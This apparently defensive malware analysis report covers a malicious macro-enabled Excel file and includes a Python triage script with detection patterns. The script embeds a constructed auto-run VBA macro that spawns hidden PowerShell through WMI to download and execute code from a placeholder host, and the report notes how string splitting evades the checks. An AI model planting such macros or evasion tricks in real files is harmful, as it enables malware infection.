Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 335d37e7b4b79faa…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 41.5 KB
Created: 2021-06-22 12:43:05 UTC
Authoring application: Microsoft Excel 16.0300
MD5: fe23c92c9f03e4bd4f71ac9ef8b24a34
SHA-1: 1fb29b8a2f083c140092447eb95ebdbc7d654c36
SHA-256: 335d37e7b4b79faa00517eb680da75ecd58c800a84de30813e4624b03325346e
Risk score: 160

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1204.002 User Execution: Malicious File

This Excel document contains VBA macros that reference PowerShell and cmd.exe, indicating an attempt to execute system commands from the document. The GetObject call is the usual way for VBA to obtain a COM object by moniker (for example a WMI winmgmts: namespace) and launch a process through it instead of through Shell, so a scan that only looks for Shell or WScript.Shell would miss the execution path. The primary function of the macro appears to be downloading and executing a second-stage payload; the download URL is obfuscated within the script and could not be read directly from the decoded source.

Heuristics (4)

  • OLE_VBA_PS (critical): PowerShell reference in VBA
  • OLE_VBA_GETOBJ (high): GetObject call in VBA
  • OLE_VBA_CMD (high): cmd.exe reference in VBA
  • OOXML_VBA (medium): VBA project inside OOXML; the document contains a VBA project, so macros are present
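The checks above (VBA project present in the OOXML container, PowerShell/cmd.exe/GetObject references in the decoded macro source) can be reproduced with the standard library alone. The following is an added example and not the analysis engine's own code: it does not reimplement the MS-OVBA decompression that olevba performs, so the decoded VBA is passed in as text (the macros.bas artifact is the real-world input), and it scans a constructed macro stand-in rather than the sample's actual code. The regex patterns, the SAMPLE_VBA text and the build_sample_xlsm() container are assumptions made for illustration; only the heuristic IDs, severities and the AppVersion string follow the report.

```python
"""Static triage of an OOXML (xlsm/docm) file for an embedded VBA project and
command-execution indicators in its decoded macro source. Standard library only:
the MS-OVBA decompression olevba performs is not reimplemented here, so the
decoded VBA is passed in as text (the report's macros.bas is the real-world input)."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

EXT_PROPS_NS = "{http://schemas.openxmlformats.org/officeDocument/2006/extended-properties}"

# Part names an OOXML VBA project is stored under (Excel, Word, PowerPoint).
VBA_PROJECT_PARTS = ("xl/vbaProject.bin", "word/vbaProject.bin", "ppt/vbaProject.bin")

# Heuristic IDs and severities follow the report; the regexes are this example's assumption.
VBA_INDICATORS = (
    ("OLE_VBA_PS", "critical", re.compile(r"powershell", re.I)),
    ("OLE_VBA_GETOBJ", "high", re.compile(r"\bGetObject\s*\(", re.I)),
    ("OLE_VBA_CMD", "high", re.compile(r"\bcmd(?:\.exe)?\b", re.I)),
)


def inspect_ooxml(data: bytes) -> dict:
    """Container-level facts: VBA project part (if any) and authoring app/version."""
    info = {"vba_project": None, "vba_project_size": 0, "application": None, "app_version": None}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        for part in VBA_PROJECT_PARTS:
            if part in names:
                info["vba_project"] = part
                info["vba_project_size"] = zf.getinfo(part).file_size
                break
        if "docProps/app.xml" in names:
            root = ET.fromstring(zf.read("docProps/app.xml"))
            app = root.find(EXT_PROPS_NS + "Application")
            ver = root.find(EXT_PROPS_NS + "AppVersion")
            info["application"] = app.text if app is not None else None
            info["app_version"] = ver.text if ver is not None else None
    return info


def scan_vba_source(source: str) -> list:
    """Indicator heuristics that fire on the decoded VBA, with the 1-based lines that matched."""
    hits = []
    for hid, severity, pattern in VBA_INDICATORS:
        lines = [n for n, line in enumerate(source.splitlines(), 1) if pattern.search(line)]
        if lines:
            hits.append({"id": hid, "severity": severity, "lines": lines})
    return hits


def triage(data: bytes, decoded_vba: str) -> list:
    """OOXML_VBA fires on the container; the source scan only runs when a project exists."""
    if inspect_ooxml(data)["vba_project"] is None:
        return []
    return [{"id": "OOXML_VBA", "severity": "medium", "lines": []}] + scan_vba_source(decoded_vba)


# Constructed stand-in for a decoded macro (not the sample's real code): WMI obtained via
# GetObject spawns cmd.exe, which runs PowerShell with a URL split across string literals.
SAMPLE_VBA = '''Attribute VB_Name = "ThisWorkbook"
Private Sub Workbook_Open()
    Dim w As Object, u As String
    u = "h" & "ttp://" & "exa" & "mple.invalid/s"
    Set w = GetObject("winmgmts:\\\\.\\root\\cimv2:Win32_Process")
    w.Create "cmd.exe /c powershell -w hidden -c ""iwr " & u & "|iex""", Null, Null, 0
End Sub
'''


def build_sample_xlsm(with_vba: bool = True) -> bytes:
    """Constructed minimal OOXML container; the vbaProject.bin part is a placeholder, not real OLE."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("docProps/app.xml",
                    "<Properties xmlns='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'>"
                    "<Application>Microsoft Excel</Application><AppVersion>16.0300</AppVersion></Properties>")
        if with_vba:
            # OLE compound-file magic followed by padding: enough to be carved, not to be parsed.
            zf.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56)
    return buf.getvalue()


if __name__ == "__main__":
    doc = build_sample_xlsm()
    print(inspect_ooxml(doc))
    for h in triage(doc, SAMPLE_VBA):
        print(f"{h['id']:<16}{h['severity']:<9}lines {h['lines']}")
```

Run it as-is to see all four heuristics fire on the constructed container and macro; for a real sample, feed the xlsm bytes to triage() together with the source that olevba extracted (the macros.bas artifact). Note that the GetObject and cmd.exe indicators are line-level string matches, so a macro that builds "GetObject" or "cmd" from concatenated fragments, as this sample does with its URL, will evade them; that is why the report's verdict rests on the combination of indicators rather than any single one.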

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
  Kind:    vba-macro
  Source:  oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size:    34430 bytes
  SHA-256: 17329826a372cf58a4bcdc0f574b7bb78178aa11cdb371f8c076797c5ea2d426

Filename: vbaProject_00.bin
  Kind:    vba-project
  Source:  OOXML VBA project: xl/vbaProject.bin
  Size:    11264 bytes
  SHA-256: e368c61b316a6aad0c19545664b89156a21193dab95c2ea6ab712d510fdb5a2f